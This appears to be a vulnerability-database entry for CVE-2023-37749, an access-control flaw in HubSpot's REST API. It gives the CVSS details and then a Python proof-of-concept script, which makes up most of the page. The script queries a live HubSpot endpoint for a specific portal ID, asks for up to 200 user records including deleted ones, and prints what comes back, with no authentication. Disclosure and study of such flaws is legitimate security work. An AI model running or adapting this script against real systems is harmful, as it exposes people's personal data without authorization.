Incorrect access control in the REST API endpoint of HubSpot v1.29441 allows unauthenticated attackers to view users' data without proper authorization.
CVSS Details
CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Configurations (Affected Products)
No configuration data available.
HubSpot v1.29441
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-37749 PoC - HubSpot Unauthenticated User Data Access
# Affected Version: HubSpot v1.29441
# Vulnerability: Incorrect Access Control in REST API Endpoint
import requests
import json
def exploit_hubspot_cve_2023_37749():
"""
Exploit for CVE-2023-37749: HubSpot REST API Unauthorized User Data Access
This PoC demonstrates how an unauthenticated attacker can access user data
through a misconfigured REST API endpoint.
"""
target_url = "https://app.hubspot.com/api/external-options/v2/pagedFetch/0-1/OWNER"
params = {
"useIndexOffset": "true",
"portalId": "22152277",
"clienttimeout": "14000",
"hs_static_app": "settings-ui-users",
"hs_static_app_version": "1.43001",
"limit": "200",
"q": "",
"offset": "0",
"includeDeleted": "true"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "application/json"
}
print("[*] Attempting to exploit CVE-2023-37749...")
print(f"[*] Target URL: {target_url}")
try:
response = requests.get(target_url, params=params, headers=headers, timeout=30)
if response.status_code == 200:
print("[+] Request successful - User data may be exposed!")
data = response.json()
print(f"[+] Response received: {json.dumps(data, indent=2)[:500]}...")
return data
elif response.status_code == 401:
print("[-] Authentication required - Endpoint may be patched")
else:
print(f"[-] Unexpected status code: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] Request failed: {e}")
return None
if __name__ == "__main__":
exploit_hubspot_cve_2023_37749()